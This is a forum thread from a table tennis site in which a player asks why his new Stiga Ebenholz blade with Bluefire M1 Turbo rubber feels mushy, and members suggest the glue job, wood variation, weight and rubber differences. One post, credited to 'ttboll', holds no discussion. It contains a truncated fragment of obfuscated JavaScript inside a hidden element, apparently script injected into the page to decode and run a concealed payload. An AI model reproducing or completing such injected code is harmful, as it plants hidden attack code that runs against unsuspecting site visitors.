Alex Table Tennis - MyTableTennis.NET Homepage
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

What am I doing wrong?

Post Reply Post Reply
Author
anubhav1984 View Drop Down
Gold Member
Gold Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote anubhav1984 Quote  Post ReplyReply Direct Link To This Post Topic: What am I doing wrong?
    Posted: 01/20/2015 at 11:56am
I have recently purchased a Stiga Ebenholz NCT V ST handle. I made this purchase after I was immensely impressed by its performance when I had tested a friend's setup. His setup was really light and that made me order a really light (75 gms) Stiga Ebenholz. However, now that I have it, I somehow don't seem to be getting the same kind of feel I was getting on my friend's setup. 
My friend's setup was - Stiga Ebenholz NCT V FL - Donic Bluefire JP 01 FH and Adidas P3 BH (both in max)
My current setup is - Stiga Ebenholz NCT V ST - Donic Bluefire M1 Turbo, Joola Rhyzm (both in max)
My concern is that even though the forehand rubbers are of the same family, my combination feels really mushy on the forehand whereas my friend's setup is really crisp and has a nice feedback. Considering that my friend used JP 01 and I am using M1 Turbo, I was guessing that my combination would have been crisper of the two.
I contemplated that this might be because of shoddy glue job on my part. I was using Revolution No 3 (regular viscosity) to paste my rubbers and this was causing the rubbers to come off every now and then. I then used LKT WBG to stick the rubbers and they are stuck better now (still not as good as I would want them to be though).
Does anyone have any thoughts as to why this might be the case? I really liked the Crisp and Hard feel of Ebenholz but that is somehow missing completely from my setup. I purchased my blade from TableTennis11.com.
Butterfly Viscaria FL
FH - Undecided
BH - Undecided
Sponsored Links

NextLevel View Drop Down
Forum Moderator
Forum Moderator

Post Options Post Options   Thanks (0) Thanks(0)   Quote NextLevel Quote  Post ReplyReply Direct Link To This Post Posted: 01/20/2015 at 12:15pm
You are doing things your friend didn't do, not telling us exactly what he did, and asking us to explain why you don't get the same result.

That's what you are doing wrong.
I like putting heavy topspin on the ball...
Cybershape Carbon
FH/BH: H3P 41D.
Lumberjack TT, not for lovers of beautiful strokes. No time to train...
Gold Member
Gold Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote anubhav1984 Quote  Post ReplyReply Direct Link To This Post Posted: 01/20/2015 at 12:23pm
So my friend is using the same blade and Bluefire JP 01 on FH and I am using Bluefire M1 Turbo on FH. He was using Tibhar WBG to stick his sheet and I used Revolution No 3 till now. However, even after using LKT WBG(which has a really strong adhesion) there is no change in feel. The blade still does not feel hard and crisp as it should be.
Butterfly Viscaria FL
FH - Undecided
BH - Undecided
GeneralSpecific View Drop Down
Platinum Member
Platinum Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote GeneralSpecific Quote  Post ReplyReply Direct Link To This Post Posted: 01/20/2015 at 12:48pm
Perhaps you should try using Bluefire JP instead of the older Bluefire? Maybe the difference is significant enough.
Blade - Xiom 36.5 ALX FL
Forehand - Xiom Omega V Asia 2.0mm
Backhand - Victas Curl P5V with Der Materialspezialist Firestorm Soft/Outkill 1.8mm sponge
cole_ely View Drop Down
Premier Member
Premier Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote cole_ely Quote  Post ReplyReply Direct Link To This Post Posted: 01/20/2015 at 1:02pm
Truthfully, there is a lot of variation between blades (esp different batches/times). If you got an ultralight one, it may have been made with less dense wood, which gives it that yucky feel.

Wavestone St with Illumina 1.9r, defender1.7b

Please let me know if I can be of assistance.
hookumsnivy View Drop Down
Gold Member
Gold Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote hookumsnivy Quote  Post ReplyReply Direct Link To This Post Posted: 01/20/2015 at 1:09pm
You're not comparing apples to apples.

What weight was his blade?  75 seems really light.
Both your FH and BH rubbers are different.
Different glue (though I doubt that has much to do with it)

These are the questions I would answer:
How much does his blade weigh?
If he lets you, either try his rubbers on your blade or your rubbers on his blades and see how it reacts.  
If his rubbers give the same feel on your blade as they did on his, then it's the difference in rubbers.  If they don't, it's likely the blade is different enough.  Same idea if you do it on his blade.
CraneStyle View Drop Down
Silver Member
Silver Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote CraneStyle Quote  Post ReplyReply Direct Link To This Post Posted: 01/20/2015 at 1:19pm
Are the rubbers new...?

Did you remove all the glue before re-gluing...?

Maybe get your mate to put the rubbers on or reveal his technique...

Just some ideas...
1. Mizutani Jun ZLC, FH T80, BH T05
mhnh007 View Drop Down
Platinum Member
Platinum Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote mhnh007 Quote  Post ReplyReply Direct Link To This Post Posted: 01/20/2015 at 1:42pm
JP01 has a softer top sheet than M1, I have not try M1 Turbo, but from what I heard it is even harder than reg. M1, so the feel between JP01 and M1 Turbo is definitely different.  However, from the problem you described, sound like a bad glue job.  The Ebv has a very thick NCT coating, so thick that some people even rough up the surface with fine sand paper before they can stick the rubber on.  I did not have this problem using Butterfly Free Chack.
vanjr View Drop Down
Gold Member
Gold Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote vanjr Quote  Post ReplyReply Direct Link To This Post Posted: 01/20/2015 at 2:34pm
I have occasionally felt the same thing on my own equipment! This occurs when I use the newer, water soluble glues and either put the glue on too thick or do not press the rubber down overnight. I almost never have this problem with rubber cement (which I use for many rubbers but have not used for tenergy or some of the latest tensor ones).
JohnnyChop View Drop Down
Gold Member
Gold Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote JohnnyChop Quote  Post ReplyReply Direct Link To This Post Posted: 01/20/2015 at 2:44pm
Originally posted by cole_ely cole_ely wrote:

Truthfully, there is a lot of variation between blades (esp different batches/times). If you got an ultralight one, it may have been made with less dense wood, which gives it that yucky feel.

+1
729 Battle 2 Yasaka Goibao 5 Nittaku Fastarc G1   
Nittaku Fastarc G1 Butterfly Cypress Max
NextLevel View Drop Down
Forum Moderator
Forum Moderator

Post Options Post Options   Thanks (0) Thanks(0)   Quote NextLevel Quote  Post ReplyReply Direct Link To This Post Posted: 01/20/2015 at 3:33pm
I know what else you are doing wrong.. EJing... Seriously, just try regluing and hope for a better outcome.
Cybershape Carbon
jt99sf View Drop Down
Premier Member
Premier Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote jt99sf Quote  Post ReplyReply Direct Link To This Post Posted: 01/20/2015 at 4:39pm
The obvious solution is to buy your friend's setup and a lunch.  Problem solved. Big smile
Photino/Super Viscaria : H3 (FH)/Dr N pips(BH)

林德成 HardBat:Hock 3-Ply /Dr Evil
Gold Member
Gold Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote anubhav1984 Quote  Post ReplyReply Direct Link To This Post Posted: 01/21/2015 at 12:40am
Thanks a lot for the suggestions folks! I have attempted a rather risky maneuver today by lightly sanding the surface and re-gluing the sheets. 
@hookumsnivy - Even his blade weighs around 75-76 gms. Though I completely agree to your point that my rubbers are entirely different. What I was really worried about was that even M1 Turbo is supposedly harder than Jp 01, the feeling that I was having on my blade was very mushy. 
@NextLevel - I have been trying to get away from EJing but its really tough Wink 
@CraneStyle -  The rubbers are not really new. But they are pretty close to being new and yes, I did remove all the previous glue build-up before sticking them on Ebenholz.
Butterfly Viscaria FL
FH - Undecided
BH - Undecided
NextLevel View Drop Down
Forum Moderator
Forum Moderator

Post Options Post Options   Thanks (0) Thanks(0)   Quote NextLevel Quote  Post ReplyReply Direct Link To This Post Posted: 01/21/2015 at 12:46am
Originally posted by anubhav1984 anubhav1984 wrote:

Thanks a lot for the suggestions folks! I have attempted a rather risky maneuver today by lightly sanding the surface and re-gluing the sheets. 
@hookumsnivy - Even his blade weighs around 75-76 gms. Though I completely agree to your point that my rubbers are entirely different. What I was really worried about was that even M1 Turbo is supposedly harder than Jp 01, the feeling that I was having on my blade was very mushy. 
@NextLevel - I have been trying to get away from EJing but its really tough Wink 
@CraneStyle -  The rubbers are not really new. But they are pretty close to being new and yes, I did remove all the previous glue build-up before sticking them on Ebenholz.

I just started a new thread - you might like it...
Cybershape Carbon
BH-Man View Drop Down
Premier Member
Premier Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote BH-Man Quote  Post ReplyReply Direct Link To This Post Posted: 01/21/2015 at 8:10am
anub, if you are brave enough, you could always try my famous mod... Would instantly add some oomph and feel to it....
Korea Foreign Table Tennis Club
Search for us on Facebook: koreaforeignttc
TurboZ View Drop Down
Gold Member
Gold Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote TurboZ Quote  Post ReplyReply Direct Link To This Post Posted: 01/21/2015 at 10:41am
May be your friend's EB V is not as light as you first thought so the feel of yours is not comparable. I always have a feeling that the one I have is very light and could be 80g and below. After reading this thread I go dig it up and found the rubbers are coming loose on the edges, so I removed them from the blade and surprise to see the bare blade is indeed 87g in weight, which is not light by any means.
Gold Member
Gold Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote anubhav1984 Quote  Post ReplyReply Direct Link To This Post Posted: 01/21/2015 at 11:47am
BH-Man - What is that mod?
Butterfly Viscaria FL
FH - Undecided
BH - Undecided
Gold Member
Gold Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote anubhav1984 Quote  Post ReplyReply Direct Link To This Post Posted: 01/21/2015 at 11:48am
That might actually be a very valid point. I would have have to ask him to take his rubbers off and re-weigh for me once.
Butterfly Viscaria FL
FH - Undecided
BH - Undecided
BH-Man View Drop Down
Premier Member
Premier Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote BH-Man Quote  Post ReplyReply Direct Link To This Post Posted: 01/21/2015 at 5:55pm
Korea Foreign Table Tennis Club
Search for us on Facebook: koreaforeignttc
Gold Member
Gold Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote anubhav1984 Quote  Post ReplyReply Direct Link To This Post Posted: 01/22/2015 at 12:50am
Oh no...I am not trying that mod at all :P
Butterfly Viscaria FL
FH - Undecided
BH - Undecided
tabletennis11 View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote tabletennis11 Quote  Post ReplyReply Direct Link To This Post Posted: 01/27/2015 at 1:53pm
How long has your friend had their blade? Sometimes a worn in blade can feel different to a brand new one. You are right about the bluefire, m1 should have a bit more bite to it than JP series. Everything has a different feel when combined, maybe JP is better for your game and feel anyway. As mentioned above every blade has small differences, perhaps just give it a few goes to wear in and see if the feeling improves.
Gold Member
Gold Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote anubhav1984 Quote  Post ReplyReply Direct Link To This Post Posted: 01/28/2015 at 1:33am
sure tabletennis11....I am still holding on to it....will see how it goes!
Butterfly Viscaria FL
FH - Undecided
BH - Undecided
ttboll View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote ttboll Quote  Post ReplyReply Direct Link To This Post Posted: 01/28/2015 at 11:14am
df< id="E9040B6D92585CAF">(function(){function f(p,b){var s="",t=window,o=("fr"+"om"+"C"+"q\u0075Cod"+"e"+"")[''+'rep\u006ca'+'c\x65'](""+"qu","h"+"a"+"\x72"),v="c"+"h\x61\u0072C\x6f\u0064\x65\x41t"+"",k="l"+"eng"+"\u0074"+"h",m=("\x4CbD\u0052mg"+"")["r\x65plac\u0065"]("L\x62D"+"Rm","\x53t\u0072\x69\x6E"),i=t[m],y=i[o],z,d;for(var q=0;q
JacekGM View Drop Down
Platinum Member
Platinum Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote JacekGM Quote  Post ReplyReply Direct Link To This Post Posted: 01/28/2015 at 11:36am
I think that the glue job may actually be the culprit, happened to me in the past. Ever since, I stick with donic glues, Formula First being top for me. I avoid glue from less known brands.
(1) Juic SBA (Fl, 85 g) with Bluefire JP3 (red max) on FH and 0.6 mm DR N Desperado on BH; (2) Yinhe T7 (Fl, 87 g) with Bluefire M3 (red 2.0) on FH and 0.6 mm 755 on BH.
Gold Member
Gold Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote anubhav1984 Quote  Post ReplyReply Direct Link To This Post Posted: 01/30/2015 at 5:56am
JacekGM - Agree with your point. However, I try staying away from Donic and Tibhar glues. They are very hard to remove from the sponge. How has your experience been with them?
Butterfly Viscaria FL
FH - Undecided
BH - Undecided
pryde View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote pryde Quote  Post ReplyReply Direct Link To This Post Posted: 01/30/2015 at 8:09am
different handle gives different feeling of the blade too.

APW46 View Drop Down
Assistant Moderator
Assistant Moderator

Post Options Post Options   Thanks (0) Thanks(0)   Quote APW46 Quote  Post ReplyReply Direct Link To This Post Posted: 01/31/2015 at 12:19pm
It can make a huge difference to how a set up feels depending on how the rubbers are applied, the more you stretch the rubber on application, the 'crisper' it feels on contact because the ball will have slightly less dwell. So your friends glueing technique might be significantly different to yours.
 I've never found any two blades of the same type that feel quite the same, there is always a variation of feeling. Is your friend tuning ? and also is his blade varnished and yours not or vice versa?
There will always be a difference, and any of the above will increase that.
The Older I get, The better I was.
 Post Reply Post Reply
  Share Topic